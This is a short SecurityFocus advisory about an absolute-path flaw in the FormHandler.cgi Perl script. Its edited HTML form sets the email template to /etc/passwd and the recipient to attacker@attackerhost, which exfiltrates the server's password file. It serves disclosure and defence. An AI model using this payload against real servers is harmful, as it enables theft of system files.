FormHandler.cgi Absolute Path Vulnerability

The FormHandler perl cgi program, available from http://www.cgi-perl.com/programs/FormHandler, provides a means for attackers to view all files on the server that the cgi script has read access to.

FormHandler supports the use of templates in email messages that result from a form submission. These templates are saved as files, which can be referenced by absolute pathnames in the form document. It would be a trivial matter to save a local copy of a form from the target site, and edit it as follows:

Original form:
<INPUT TYPE="hidden" NAME="recipient" VALUE="webmaster@victimhost">
<INPUT TYPE="hidden" NAME="subject" VALUE="Form Results">
<INPUT TYPE="hidden" NAME="email_template" VALUE="/usr/web/docs/templates/form.txt">

Edited form:
<INPUT TYPE="hidden" NAME="recipient" VALUE="attacker@attackerhost">
<INPUT TYPE="hidden" NAME="subject" VALUE="Form Results :)">
<INPUT TYPE="hidden" NAME="email_template" VALUE="/etc/passwd">

Then when the attacker clicked submit on the local form, the FormHandler cgi would email the /etc/passwd file to the attacker-specified email address.


 

Privacy Statement
Copyright 2010, SecurityFocus